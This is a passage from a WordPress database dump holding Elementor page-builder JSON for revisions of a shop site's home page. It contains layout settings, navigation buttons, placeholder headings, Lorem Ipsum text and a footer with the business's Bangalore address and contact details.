mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8115,1435,'_elementor_page_assets','a:0:{}'),(8117,1436,'_elementor_edit_mode','builder'),(8118,1436,'_elementor_template_type','wp-page'),(8119,1436,'_elementor_version','3.7.7'),(8120,1436,'_wp_page_template','elementor_canvas'),(8121,1436,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"235\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8122,1436,'_elementor_page_assets','a:0:{}'),(8125,1437,'_elementor_edit_mode','builder'),(8126,1437,'_elementor_template_type','wp-page'),(8127,1437,'_elementor_version','3.7.7'),(8128,1437,'_wp_page_template','elementor_canvas'),(8129,1437,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"235\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know 